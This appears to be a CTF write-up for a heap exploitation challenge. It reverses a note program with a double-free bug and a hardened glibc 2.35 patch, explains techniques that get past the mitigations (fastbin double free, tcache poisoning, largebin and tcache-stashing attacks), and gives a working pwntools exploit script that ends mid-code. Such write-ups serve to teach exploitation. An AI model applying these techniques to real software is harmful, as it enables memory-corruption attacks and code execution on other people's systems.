locked room

Introduction

locked_room was a difficult heap challenge from this CTF, where the gimmick was that the libc was patched with multiple security mitigations. I didn't solve it during this CTF (rip), but I did get close, and managed to solve it the next day. Anways, let the madness begin.

Reversing

As expected, we have full protections on the main binary, cos why not.

The binary itself also isn't tooo interesting, just a simple heap note with just alloc, free and view:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>

#define BUF_SIZE 20
#define MAX_ALLOCS 100

typedef struct Alloc {
    unsigned char * data;
    uint64_t len;
} Alloc;

Alloc allocs[MAX_ALLOCS];
int current_index = 0;

void menu() {
    write(1, "1. Alloc\n", 9);
    write(1, "2. Free\n", 8);
    write(1, "3. View\n", 8);
    write(1, "4. Exit\n", 8);
}

void alloc_chunk() {
    char buf[BUF_SIZE];
    unsigned int size = 0;
    if (current_index >= MAX_ALLOCS) {
        write(1, "Out of space!\n", 14);
        return;
    }
    write(1, "Size?\n> ", 8);
    read(0, buf, BUF_SIZE);
    size = strtoul(buf, NULL, 10);
    if (size > 0x800) {
        write(1, "Too big!\n", 9);
        return;
    }
    allocs[current_index].data = malloc(size);
    allocs[current_index].len = 0;

    write(1, "Data?\n> ", 8);
    size_t amt_read = read(0, allocs[current_index].data, size);
    if (amt_read > 0) {
        allocs[current_index].len = amt_read;
    }

    current_index++;
    write(1, "Done!\n", 6);
}

void free_chunk() {
    char buf[BUF_SIZE];
    unsigned int i = 0;
    write(1, "Index?\n> ", 9);
    read(0, buf, BUF_SIZE);
    i = strtoul(buf, NULL, 10);
    if (i < MAX_ALLOCS) {
        free(allocs[i].data);
        allocs[i].len = 0;
    } else {
        write(1, "Invalid index!\n", 15);
        return;
    }
    write(1, "Done!\n", 6);
}

void view_chunk() {
    char buf[BUF_SIZE];
    unsigned int i = 0;
    write(1, "Index?\n> ", 9);
    read(0, buf, BUF_SIZE);
    i = strtoul(buf, NULL, 10);
    if (i < MAX_ALLOCS && allocs[i].data != NULL && allocs[i].len > 0) {
        write(1, allocs[i].data, allocs[i].len);
    } else {
        write(1, "Invalid index!\n", 15);
    }
}

int main() {
    char buf[BUF_SIZE];
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);

    write(1, "You're in a locked room. Can you escape?\n", 41);
    write(1, "I'll say it in red: \x1B[31mIn this room, you can only malloc and free. Your goal is to escape and reach the flag.\x1B[0m\n", 116);
    write(1, "I'll say it in blue: \x1B[36mWith the hardened allocator, it is impossible to escape! You will be stuck here forever!\x1B[0m\n", 119);

    while (1) {
        menu();
        write(1, "> ", 2);
        unsigned long choice = 0;
        read(0, buf, BUF_SIZE);
        choice = strtoul(buf, NULL, 10);
        switch (choice) {
            case 1:
                alloc_chunk();
                break;
            case 2:
                free_chunk();
                break;
            case 3:
                view_chunk();
                break;
            case 4:
                write(1, "\x1B[31mYou are incompetent!\x1B[0m\n", 30);
            default:
                _exit(0);
        }
    }
    return 0;
}

Emphasis on simple, as a common pattern in this binary, and the challenge as a whole, is that barebones functions like read, write and _exit are used instead of IO functions and exit which have complexity that can be attacked and manipulated, which reduces our options for RCE :(

Double free

The bug isn't too hard to spot: when a chunk is freed, its .len field is nulled, but not the pointer itself, and since there's no check in free_chunk for .len == 0, nothing stops us from freeing a chunk twice!

Libc patches

Well, nothing in the program at least. The interesting part of the challenge comes from the libc.patch file we're given, which changes the malloc/ code in glibc source (version 2.35).

PREV_FAST_FREED

+/* size field is or'ed with PREV_FAST_FREED when previous adjacent chunk
+  is a freed fastbin chunk. */
+#define PREV_FAST_FREED 0x8

Firstly, it introduces a new bit flag to put in size fields of chunks. The idea is to track which chunks have been freed to the fastbin, similarly to PREV_INUSE with unsortedbin/smallbin/largebins, so that double frees can be better detected, as current measures are easy to bypass, along with other fastbin sanity checks.

It also doubles as an anti-debugging measure, as vis_heap_chunks struggles when faced with this flag >:(

tcache = fastbin

@@ -3196,6 +3208,10 @@ tcache_get (size_t tc_idx)
   tcache->entries[tc_idx] = REVEAL_PTR (e->next);
   --(tcache->counts[tc_idx]);
   e->key = 0;
+  e->next = NULL;
+  if (__glibc_unlikely(csize2tidx (chunksize (mem2chunk (e)))) != tc_idx) {
+    malloc_printerr ("malloc(): memory corruption (tcache)");
+  }
   return (void *) e;

RIP tcache, you will be missed, as it now has the same check for a valid size field that fastbin does. This, along with the requirement that tcache (and fastbin) chunks are 16-byte aligned (so no misaligned size tricks), basically kills tcache as an easy win.

no escape?

@@ -3311,24 +3329,34 @@ __libc_malloc (size_t bytes)
       && tcache->counts[tc_idx] > 0)
     {
       victim = tcache_get (tc_idx);
+      mchunkptr victim_chunk = mem2chunk (victim);
+      ar_ptr = arena_for_chunk (victim_chunk);
+      max_address = (char *) (ar_ptr->top) + chunksize (ar_ptr->top);
+      min_address = max_address - ar_ptr->system_mem;
+      assert (((char *) victim_chunk) >= min_address);
+      assert (((char *) victim_chunk + chunksize (victim_chunk)) <= ((char *) (ar_ptr->top)));
       return tag_new_usable (victim);
     }
   DIAG_POP_NEEDS_COMMENT;
 #endif
 
-  if (SINGLE_THREAD_P)
-    {
-      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
-      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
-	      &main_arena == arena_for_chunk (mem2chunk (victim)));
-      return victim;
-    }
+  victim = tag_new_usable (_int_malloc (&main_arena, bytes));
+  mchunkptr victim_chunk = mem2chunk (victim);
+  ar_ptr = arena_for_chunk (victim_chunk);
+  max_address = (char *) (ar_ptr->top) + chunksize (ar_ptr->top);
+  min_address = max_address - ar_ptr->system_mem;
+  assert (!victim || chunk_is_mmapped (victim_chunk) ||
+    &main_arena == arena_for_chunk (victim_chunk));
+  assert (((char *) victim_chunk) >= min_address &&
+    ((char *) victim_chunk + chunksize (victim_chunk)) <= ((char *) (ar_ptr->top)));
+  return victim;

This is arguably the most annoying change, which restricts where our allocations can be.

Maximum address is top + chunksize(top), which points to the end of the (allocated) heap region, and the minimum address is the maximum minus av->system_mem, which is the total amount of memory currently allocated for that region, so the minimum would be the start of the region.

It also prevents the end of our chunk coming after the top chunk, so no overlapping chunks with the top chunk to corrupt it, or allocating past it.

These changes seem to be adapated from do_check_chunk, and thankfully they only used those, cos the debug chunks are 💀

No IO for you

@@ -298,13 +298,10 @@ static void
  __malloc_assert (const char *assertion, const char *file, unsigned int line,
 		 const char *function)
 {
-  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
-		     __progname, __progname[0] ? ": " : "",
-		     file, line,
-		     function ? function : "", function ? ": " : "",
-		     assertion);
-  fflush (stderr);
-  abort ();
+  write(2, "Assertion failed.\n", 18);
+  write(2, assertion, strlen(assertion));
+  write(2, "\n", 1);
+  _exit(-1);

Like I mentioned earlier, a pattern is using barebones functions, to reduce the attack surface for RCE, so now we can't use stderr or printf.

One interesting thing to note here though, is that there's a call to strlen, which when used in libc, is called using libc's PLT and GOT, as it can use different architecture specific implementations like SSE2 or AVX2.

Since we're using glibc 2.35, libc GOT is still writable (due to Partial RELRO), so this could be an avenue for code execution (however it's not what I used).

Other changes

There are a few more, smaller changes, such as:

Nulling more leftover pointers in malloc.
Only recognising main_arena: arena_for_chunk always returns &main_arena. (For this reason, when I refer to av, this will be the same as main_arena).

Patching source

One thing that you may find helpful when doing this challenge is to have reference to patched malloc.c file, as this will help with reading the new source code, but also gdb will recognise malloc.c and you can debug malloc and free with source code. Just copy the malloc/malloc.c and malloc/arena.c files to your system, then do:

$ patch -p2 -i ../libc.patch
patching file arena.c
patching file malloc.c

Exploitation

So it looks like we've got our work cut out for us here. Let's start off easy, and write our handlers and get our leaks:

Handlers

send_choice = lambda c: p.sendlineafter(b"> ", str(c).encode())

current_index = 0
def malloc(size, data=None):
    if data is None:
        data = b"X"
    global current_index
    send_choice(1)
    p.sendlineafter(b"Size?\n> ", str(size).encode())
    p.sendafter(b"Data?\n> ", data)
    current_index += 1
    return current_index-1

def free(i):
    send_choice(2)
    p.sendlineafter(b"Index?\n> ", str(i).encode())

def view(i):
    send_choice(3)
    p.sendlineafter(b"Index?\n> ", str(i).encode())
    return p.recvuntil(b"1. Alloc\n", drop=True)

Leaking libc and heap

alloc_chunk works by setting the .len of a chunk to the amount of data we read in the read call, so no read OOB, and .len is nulled on a free, so no read after free either + pointers nulled on malloc call.

Fortunately we can use the UAF to overlap chunks to get leak. The basic idea is:

Allocate a chunk a, then free it.
Reallocate it with another chunk b, setting b.len to a suitable length.
With UAF, free a again. Since a = b, we have UAF on b!
Now use b to read the freed chunk.

I opted to use a large chunk bordering the top chunk, effectively UAFing the top chunk, then any allocation would overlap with the UAFed one.

# leaking libc
uaf = malloc(0x800)
free(uaf)

i = malloc(0x800, b"A"*8)
malloc(8)

free(uaf)
libc_leak = u64(view(i))
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - (libc.sym.main_arena+96)
log.info(f"libc: {hex(libc.address)}")

# leaking heap: PROTECT_PTR(0, heap+0xXXX)
i = malloc(0x18, b"A"*8)
free(uaf)
heap_leak = u64(view(i))
log.info(f"heap leak: {hex(heap_leak)}")

heap = heap_leak << 12
log.info(f"heap: {hex(heap)}")

Control tcache_perthread_struct

A useful tool for solving heap challenges is tcache_perthread_struct, a goldmine for arbitrary writes, and it will be useful here too (even if it's only on the heap for now).

The problem is, to get initial corruption we only have a double free, and in this version of libc, double frees are heavily mitigated: tcache can't be double freed without a write after free, and the doubly linked list bins like unsortedbin also have measures. Normally we could use the fastbin double free trick, but now we have PREV_FAST_FREED, so ideally we want to find a way to clear that bit.

Thankfully the patch isn't completely thorough in its enforcement of PREV_FAST_FREED. Looking through the patch for references to setting PREV_FAST_FREED, we can notice that there's some instances where it's left out.

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4369

victim = av->top;
size = chunksize (victim);

if (__glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): corrupted top size");

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
  {
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
  }

For example, the above snippet is untouched by the patch, and is for when an allocation is serviced from the top chunk. victim is the chunk that will be allocated and returned to the user, and we can see that it will have the PREV_INUSE bit set, and maybe the NON_MAIN_ARENA bit, but no reference to PREV_FAST_FREED.

In other words, if the top chunk has PREV_FAST_FREED, it won't be preserved.

So now we have a plan for a double free on fastbin:

Allocate 2 chunks a and b, such that b borders the top chunk.
Free b to fastbin. This sets top chunk's PREV_FAST_FREED.
Allocate from top chunk to clear PREV_FAST_FREED.
Free a then b.

Chunk a is still needed to avoid the other double free protection, where it checks that the fastbin chunk being freed isn't at the top of fastbin.

We can then use this to get an allocation on the heap to poison the fd pointer of a tcache[0x290] chunk, and point that to heap_base+0x10, and now we control all tcache allocations!

class TcachePerthreadStruct:
    def __init__(self):
        self.counts = [0]*64
        self.pointers = [0]*64
    def set_count(self, size, count):
        idx = (size - 0x20) // 16
        self.counts[idx] = count
    def set_pointer(self, size, pointer):
        idx = (size - 0x20) // 16
        self.pointers[idx] = pointer
    def set(self, size, pointer, count=1):
        self.set_pointer(size, pointer)
        self.set_count(size, count)
    def __bytes__(self):
        output = b""
        for count in self.counts:
            output += p16(count)
        for pointer in self.pointers:
            output += p64(pointer)
        return output

tcache1 = malloc(0x288, flat({0x278: 0x21}))
tcache2 = malloc(0x288)

tcache = [malloc(0x18) for _ in range(7)]
fast1 = malloc(0x18)
fast2 = malloc(0x18)

# fill tcache[0x20]
for i in tcache:
    free(i)

# free fastbin chunk next to top chunk
# so that av->top has PREV_FAST_FREED
free(fast2)

# allocate from top chunk to clear PREV_FAST_FREED
malloc(0x28)

# double free fast2
free(fast1)
free(fast2)

# alloc back tcache[0x20]
for _ in range(7):
    malloc(0x18)

# corrupt fastbin[0x20] to point to just before a tcache[0x290] chunk
malloc(0x18, p64(protect(heap + 0xd50, heap+0x1000)))

# bring arb pointer to head of fastbin[0x20]
malloc(0x18)
malloc(0x18)

# free 2 tcache[0x290] chunks
free(tcache1)
free(tcache2)

# poison tcache[0x290] -> tcache_perthread_struct
malloc(0x18, flat({0x08: 0x291, 0x10: protect(heap+0x10, heap+0xd50)}))

tcache = TcachePerthreadStruct()
tcache.set(0x290, heap+0x10)
malloc(0x288)
malloc(0x288, bytes(tcache))

Note that since we don't have an edit function, if we need to change tcache_perthread_struct later, we'll need to allocate on it again.

We can just do that by keep setting tcache[0x290] -> heap+0x10.

Now what?

We can now corrupt the heap to our liking .... so what?

We still have the tcache size and min/max address restrictions in play, so we can't aim our tcache allocations anywhere interesting. Ideally we'd want to corrupt the main_arena->top and main_arena->system_mem fields to adjust the min/max addresses, and open up our arbitrary allocation possibilites, but how do we do that without allocating onto them???

Largebin attack -> Large Memory

Just because we can't allocate outside the heap, doesn't mean we can't write anything! Introducing the largebin attack, which can be used to write a heap address to anywhere in memory, while only allocating inside the heap. While a heap address isn't too versatile, as in we can't write any libc addresses or code pointers, it's still useful, because what we can do is aim this at main_arena->system_mem to increase the range!

While this only decreases the minimum address for now, it's a useful first step, and sets up future attacks 👀

how2heap has a useful demo of this attack, but this is a brief overview of how to do it against some address target:

Pick a largebin to use, such as 0x400-0x430.
Allocate 2 chunks a and b belonging to this largebin, where b is smaller than a (and separated from each other and top chunk).
Free a to the unsortedbin.
Allocate a chunk larger than a to send a to largebin[0x400-0x430].
Free b to unsortedbin.
Overwrite a->bk_nextsize to target-0x20.
Allocate a chunk larger than a (and b).

This will write the address of b to target, which in our case is main_arena->system_mem!

One important thing to note about overwriting main_arena->system_mem is that we don't want to make it too large. If it's much greater than av->top, then the calculation:

min_address = (top + chunksize(top)) - system_mem

Will underflow and become "negative", and since the comparisons are unsigned, then the min_address will be VERY large, and thus none of our allocations will be valid.

Overwriting av->top

So far we can shrink min_address, but (for now) this is only useful for maybe allocating on the binary's writable area. However given:

The protections of locked_room, like FULL RELRO.
The lack of an edit function, meaning we can't just overwrite pointers for an easy arbitrary write (would work for arbitrary read though).
The lack of a PIE leak.

This isn't much of a viable option. While we could overwrite the size of the top chunk to increase the max_address, this wouldn't be very helpful as the ends of our chunks, and thus the chunks themselves, can't be after the top chunk. And even though our system_mem is large now, we can't do a house of force since our allocation sizes are capped at 0x800. So we'd need to overwrite av->top to a greater address.

The largebin attack can only write heap addresses (and ones lower than av->top for that matter). While we could misalign the largebin attack , such as writing it to &av->top + 1 to make it much larger, we still need av->top to be a valid address, as it needs to be able to access chunksize(av->top).

So ideally we'd want to be able to write a libc or stack address, depending on the route for RCE you take, but how can we do that?

One way could be allocating somewhere before &av->top and overwriting av->top, but that just shifts the problem to:

How to increase av->top enough to come after &av->top.
How to write a fake size field before &av->top (for a tcache/fastbin allocation).

An attack that would have worked well for the 1st problem was the unsorted bin attack, which was like the largebin attack, except it could write a libc address instead. And not just any libc address, but it came from &av->bins, which comes after &av->top.

struct malloc_state
{
// ...
  mfastbinptr fastbinsY[NFASTBINS];
  mchunkptr top;
  mchunkptr last_remainder;
  mchunkptr bins[NBINS * 2 - 2];
// ...
};

Shame too, because there's actually a relatively simple solution to the 2nd problem. As you can see above in struct malloc_state, the fastbin array is right before ->top, and since we easily corrupt fastbin (using our tcache writes), we could bring any pointer to the head of a fastbin, but that could also be any value, such as a fake size field for a fake tcache chunk. Of course we couldn't allocate from this fastbin, and largebin allocations would fail because malloc_consolidate() would attempt to dereference this, but who actually cares?

Tcache stashing on av->top

Thankfully there is another attack which solves the 1st problem, this time involving smallbins and tcache, which can be used similarly to a largebin attack, but this allows us to write a libc address instead. But how?

The mechanism responsible for this involves moving smallbin chunks to tcache (i.e. stashing them in tcache). This is triggered in _int_malloc, specifically the initial case when it's allocating from a smallbin:

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901

if (in_smallbin_range (nb))
  {
    idx = smallbin_index (nb);
    bin = bin_at (av, idx);

    if ((victim = last (bin)) != bin)
      {
        bck = victim->bk;
        if (__glibc_unlikely (bck->fd != victim))
          malloc_printerr ("malloc(): smallbin double linked list corrupted");
        set_inuse_bit_at_offset (victim, nb);
        bin->bk = bck;
        bck->fd = bin;

If the smallbin (for the size nb) is non-empty, it unlinks the last chunk (bin->bk) and returns it. But before returning, it will then check if there are other smallbin chunks that could be linked into the tcachebin of that same size.

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3919

/* While we're here, if we see other chunks of the same size,
    stash them in the tcache.  */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
  {
    mchunkptr tc_victim;

    /* While bin not empty and tcache not full, copy chunks over.  */
    while (tcache->counts[tc_idx] < mp_.tcache_count
           && (tc_victim = last (bin)) != bin)
      {
        if (tc_victim != 0)
          {
            bck = tc_victim->bk;
            set_inuse_bit_at_offset (tc_victim, nb);
            if (av != &main_arena)
            set_non_main_arena (tc_victim);
            bin->bk = bck;
            bck->fd = bin;

            tcache_put (tc_victim, tc_idx);
          }
      }
  }

Now it iterates through the smallbin until either it's empty, or the tcache is full (this part is important), unlinking smallbin chunks the same way it was before, then adding the chunks to the tcache.

Interestingly, the check bck->fd != victim is absent in the loop, so nothing really stops us overwriting a ->bk field in one of these tc_victim chunks, to control bck. If we did that, then it would reach the line bck->fd = bin, and would write the address of the smallbin (which is located in main_arena) to bck+0x10!

One issue to deal with is what happens after this?

Since bin->bk = bck; is also triggered, we have last(bin) = bck, so we go to that chunk next in the loop, where we may face problems (depending on what our bck was).

This is where that tcache being full check comes into play. While it will believe there's more from the smallbin, if the tc_victim (with the malicious bck) was the 7th chunk for that tcache bin (i.e. tcache is now full), then it will terminate, and not do anything more with the bck.

We can use this to overwrite target=&av->top with a libc address as follows:

Allocate 8 smallbin-sized chunks (again, separated from each other and the top chunk)
Fill tcache of the same size.
Free those 8 chunks (to unsortedbin).
Allocate a bigger chunk to send them all to smallbin.
Overwrite the ->bk field of the last freed smallbin chunk to target-0x10. This will be the last chunk used in the loop (i.e. bin->fd).
Allocate a chunk of the same smallbin size.

The last allocated chunk will be serviced by the first freed smallbin chunk (bin->bk), and then the remaining 7 smallbin chunks are sent to tcache, while also writing to av->top!

By the time of av->top pointing to libc, we need av->system_mem to be large so that min_address is below the heap, thus we can still allocate within the heap region (0x7f... - 0x55... ≈ 0x2a...).

This will (of course) corrupt the smallbin used, so ideally we'd want to avoid using this smallbin for allocations, which can be done using larger chunks, or tcache.

Fixing av->top

This will have a small (or rather, large) issue. See, when av->top points into av->bins, while we have solved the problem of our allocations coming before av->top, we run into another issue: the top chunk size.

The .bins array is initially set up so that for every bin index i:

bin = av->bins[i]
assert (bin->fd == bin->bk == bin)

The way this is done is by have the fd and bk pointers point -0x10 back, so the bin->prev_size and bin->size overlap with the previous bin's fd and bk pointers.

This means that chunksize(av->top) will be the previous smallbin's bk pointer, by default a libc address, and because av->system_mem is a heap address, min_address will be too large for the main_arena allocation (0x7f... + 0x7f... - 0x55... ≈ 0xa9...).

While we could lower that bk pointer to a heap address by having chunks freed to that smallbin, so that the main_arena allocation could still work, we need to keep in mind how the tcache stashing write works. When we trigger the actual write, we allocate a smallbin chunk back on the heap, so when av->top is overwritten, it will then check if that heap chunk is valid, which it won't be due to the top chunk size.

So we need to lower that even further. For this, we can use another largebin attack! While it does only write a heap address, we can actually misalign this write by -2 so that the top 2 null bytes of the address overwrite the greatest 2 bytes of the bk pointer. This will shrink it to a 32 bit integer (from 48 bits), which is plenty small enough for that min_address calculation to be below the heap region.

This will need to be done before the tcache stashing attack, and will completely corrupt the previous smallbin, but again, who actually cares.

Leaking stack

Now that we can, in theory, setup the conditions for an allocation onto main_arena and overwrite av->top, we need to decide what we want to target.

The avenue I went down was the classic "overwrite the return address", but for that we're gonna need a stack leak. But how? Even if we could allocate on/near something like environ or __libc_argv, the view would only allow us to read the data we send (due to how .len is set), so the only way of reading the data at these variables is to overwrite them.

So it seems the only way to get a data leak is to bring it to you (i.e. into your chunk), rather than bringing our chunks to the data, which is similar to what we did when leaking libc and heap. Thankfully, we can use our good ol' friend tcache stashing to do this.

I originally found out about this technique (and tcache stashing in general) from this writeup from LA CTF.

The idea is we can "link" a stack address into a smallbin by pointing a bk pointer to it, then when the tcache stashing occurs, the stack address is the last tc_victim, and will be put into the head of the tcachebin (i.e. into tcache_perthread_struct), and since we control the allocation over tcache_perthread_struct, we can then view it to leak the stack.

So the key difference between the setup here and before, is we use 2 less smallbin chunks (8 -> 6), and we point bk to target-0x18, where target contains a stack address. This results in target-0x18 being the 6th chunk linked into tcache, then finally its bk pointer (our stack address) is the 7th and final tc_victim. And of course, since the tcache is full after linking the stack address into tcache, it terminates the loop.

Skipping past canaries

Allocating on the stack will be made more difficult by the existence of canaries, as we don't have a good way of leaking them. Like I mentioned earlier, the view function makes leaking data with allocations difficult, and we can't use the tcache stashing trick to leak them as they need to be a writable address.

Canaries do get replaced all the time, so maybe you could overwrite a canary with an allocation, then later it comes back, but then it would detect stack smashing.

main has a canary that doesn't get used, but also wouldn't be replaced, so no leak there. And since it doesn't return, the main target is alloc_chunk. So if we can't leak it, can we skip it?

Well we don't have any candidates for a tcache/fastbin allocation, but interestingly we don't actually need those: we can use av->top.

av->top doesn't have alignment restrictions like tcache/fastbins, and as long as chunksize(av->top) <= av->system_mem (house of force mitigation) then the top chunk size is considered valid. So we could actually just use the PIE address after the canary as a top chunk size, as av->system_mem is a heap address, and thus will always be bigger (you could also misalign the size to make it smaller, as it's followed by a 0).

Largebin cleanup

Once we have av->top pointing into main_arena, before we fully control av->top using the tcache allocation, a useful preparation step is alloating from av->top to overwrite the bins array to clean up the largebins. Largebins being corrupted from the largebin attacks does cause us problems when allocating from the top chunk.

Firstly, if our allocations our smaller than the largebin chunks, they will be serviced using those (through remaindering), and not the top chunk. And we can't just empty largebins, as they're corrupted. So if we use chunks larger than the largebins, we bypass this, so we're fine, right?

Not quite, because once we setup the tcache write into main_arena, the fastbin array is corrupted, and thus any large allocations will fail due to malloc_consolidate, so we wouldn't be able to allocate larger than largebins to bypass them.

This is a simple fix, it just requires fixing the pointers in av->bins:

main_arena = b""
for i in range(0, 0x440, 0x10):
    main_arena += p64(libc.sym.main_arena + 256+i)*2
malloc(0x800, main_arena)

Putting it all together

Now we (finally) have all the components for an exploit, so let's put it together:

Use double free to overlap chunks with a freed chunks, for heap and libc leaks.
Get double free on fastbins by clearing PREV_FAST_FREED using top chunk allocation to poison fastbin.
Use this fastbin to poison tcache[0x290] to allocate onto tcache_perthread_struct for infinite writes.
Allocate chunks necessary for:
1. Putting fake tcache size into the fastbin array, specifically fastbin[0x70] (size chosen for alignment reasons).
2. The 2 largebin attacks.
3. The 2 tcache stashing attacks.
Perform largebin attack against main_arena->system_mem first to decrease min_address enough to be able to still do heap allocations once av->top has been controlled.
Perform largebin attack against main_arena+262 (using larger sizes than for the previous one to avoid reallocation), which is a misaligned write on smallbin[0xa0] to setup top chunk size for later.
Do tcache stashing to leak __libc_argv for a stack leak.
Do tcache stashing against main_arena->top using smallbin[0xb0], which writes the address of &smallbin[0xa0] to main_arena->top (which has the fake top chunk size).
Do an allocation larger than (corrupted) largebins to allocate from the new av->top to clean up the largebins.
Put fake tcache size into the fastbin array (this must be done after all the largebin allocations to avoid malloc_consolidate)
Allocate on main_arena using tcache to overwrite main_arena->top to point to our target on the stack.
Use smallbin-sized allocation to allocate on the stack using top chunk, overwrite the return address to get ROP!

Exploit

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('./locked_room_patched')
libc = ELF('./libc.so', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
if args.REMOTE:
    ip, port = "dicec.tf", 32019
    conn = lambda: remote(ip, port)
else:
    conn = lambda: e.process()

send_choice = lambda c: p.sendlineafter(b"> ", str(c).encode())
protect = lambda p, addr: p ^ (addr >> 12)

current_index = 0
def malloc(size, data=None):
    if data is None:
        data = b"X"
    global current_index
    send_choice(1)
    p.sendlineafter(b"Size?\n> ", str(size).encode())
    p.sendafter(b"Data?\n> ", data)
    current_index += 1
    return current_index-1

def free(i):
    send_choice(2)
    p.sendlineafter(b"Index?\n> ", str(i).encode())

def view(i):
    send_choice(3)
    p.sendlineafter(b"Index?\n> ", str(i).encode())
    return p.recvuntil(b"1. Alloc\n", drop=True)

p = conn()

### 1. leaking libc and heap

# libc leak
uaf = malloc(0x800)
free(uaf)

i = malloc(0x800, b"A"*8)
malloc(8)

free(uaf)
libc_leak = u64(view(i))
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - (libc.sym.main_arena+96)
log.info(f"libc: {hex(libc.address)}")

# heap leak
i = malloc(0x18, b"A"*8)
free(uaf)
heap_leak = u64(view(i))
log.info(f"heap leak: {hex(heap_leak)}")

heap = heap_leak << 12
log.info(f"heap: {hex(heap)}")

# cleanup
malloc(0x18)
malloc(0x7e8)

class TcachePerthreadStruct:
    def __init__(self):
        self.counts = [0]*64
        self.pointers = [0]*64
    def set_count(self, size, count):
        idx = (size - 0x20) // 16
        self.counts[idx] = count
    def set_pointer(self, size, pointer):
        idx = (size - 0x20) // 16
        self.pointers[idx] = pointer
    def set(self, size, pointer, count=1):
        self.set_pointer(size, pointer)
        self.set_count(size, count)
    def __bytes__(self):
        output = b""
        for count in self.counts:
            output += p16(count)
        for pointer in self.pointers:
            output += p64(pointer)
        return output

### 2. double free fastbin[0x20]

tcache1 = malloc(0x288, flat({0x278: 0x21}))
tcache2 = malloc(0x288)

tcache = [malloc(0x18) for _ in range(7)]
fast1 = malloc(0x18)
fast2 = malloc(0x18)

for i in tcache:
    free(i)

# free fastbin chunk next to top chunk
# so that av->top has PREV_FAST_FREED
free(fast2)

# allocate from top chunk to clear PREV_FAST_FREED
malloc(0x28)

# double free fast2
free(fast1)
free(fast2)

### 3. poison tcache[0x290] -> tcache_perthread_struct

for _ in range(7):
    malloc(0x18)

# corrupt fastbin[0x20]
malloc(0x18, p64(protect(heap + 0xd50, heap+0x1000)))

malloc(0x18)
malloc(0x18)

free(tcache1)
free(tcache2)

malloc(0x18, flat({0x08: 0x291, 0x10: protect(heap+0x10, heap+0xd50)}))

curr_heap = heap+0x1130
large1 = curr_heap+0xdd0
large2 = large1+0xf10

tcache = TcachePerthreadStruct()
tcache.set(0x100, large1)
tcache.set(0x110, large2)
tcache.set(0x290, heap+0x10)
malloc(0x288)
malloc(0x288, bytes(tcache))


### 4. setup future attacks

# 4a. setup fastbin fake size
chunk70 = []
for i in range(15):
    data = flat({0x58: 0x31}) if i == 6 else b"\x00"
    chunk70.append(malloc(0x68, data))


# 4b. setup largebin attack on av->system_mem
p2 = malloc(0x718)
malloc(0x18, flat(0, 0x101))

p1 = malloc(0x728)
malloc(0x18)


# setup largebin attack on main_arena+262 (smallbin[0xa0])
q2 = malloc(0x798)
malloc(0x18, flat(0, 0x111))

q1 = malloc(0x7a8)
malloc(0x18, flat(0, 0x51))    # fake size for corrupting next chunk

# 4c. setup 2 tcache staching attacks
small_av_top = []
small_leak_stack = []

small_av_top.append(malloc(0xa0, flat({0x98: 0x41})))
small_leak_stack.append(malloc(0x80))

for i in range(5):
    small_av_top.append(malloc(0xa0))
    small_leak_stack.append(malloc(0x80))
small_av_top.append(malloc(0xa0))
malloc(0x18)
small_av_top.append(malloc(0xa0))
malloc(0x18)    # pad

### 5. do largebin attack on av->system_mem

# this writes a heap address (address of corrupted largebin) to av->system_mem
free(p1)
malloc(0x738)

free(p2)

target = libc.sym.main_arena+2184
malloc(0xf8, p64(0) + p64(0x731) + p64(large1)*3 + p64(target-0x20))
malloc(0x738)


### 6. do largebin attack on main_arena (smallbin[0xa0])

# this is a misaligned write onto &smallbin[0xa0].bk - 2
# the upper 2 null bytes will overwrite the MSB of smallbin[0xa0].bk
# shrinking it enough to be a valid top chunk size later on
free(q1)
malloc(0x7b8)

free(q2)

target = libc.sym.main_arena+262
malloc(0x108, p64(0) + p64(0x7b1) + p64(large2)*3 + p64(target-0x20))
malloc(0x7b8)


tcache = TcachePerthreadStruct()
tcache.set(0x40, curr_heap+0x2560)
tcache.set_count(0x90, 7)      # fill tcache[0x90]
tcache.set(0x290, heap+0x10)
malloc(0x288, bytes(tcache))

### 7. tcache stashing to leak stack

# free to unsortedbin -> smallbin[0x90]
for i in reversed(range(len(small_leak_stack))):
    free(small_leak_stack[i])
malloc(0xc0)

malloc(0x38, flat(0, 0x91, curr_heap+0x26a0, libc.sym.__libc_argv - 0x18))

tcache = TcachePerthreadStruct()
tcache.set(0x50, curr_heap+0x24b0)
tcache.set_count(0xb0, 7)       # fill tcache[0xb0]
tcache.set(0x290, heap+0x10)
t = malloc(0x288, bytes(tcache))

malloc(0x80)

stack_leak = u64(view(t)[0xb8:0xc0])
log.info(f"stack_leak: {hex(stack_leak)}")

### 8. tcache stashing on av->top

# this writes a libc address (main_arena+256) to av->top
# this points to smallbin[0xa0], so smallbin[0xa0].bk (that we overwrote earlier)
# now acts as the top chunk's size

# free to unsortedbin -> smallbin[0xb0]
for i in reversed(range(len(small_av_top))):
    free(small_av_top[i])
malloc(0xc0)

target = libc.sym.main_arena+96     # main_arena->top
malloc(0x48, flat(0, 0xb1, curr_heap+0x2730, target - 0x10))

# empty tcache[0xb0]
tcache = TcachePerthreadStruct()
tcache.set(0x30, curr_heap+0x310)
tcache.set(0x290, heap+0x10)
t = malloc(0x288, bytes(tcache))

malloc(0xa0)

### 9. allocate using new av->top to fix the largebins

main_arena = b""
for i in range(0, 0x440, 0x10):
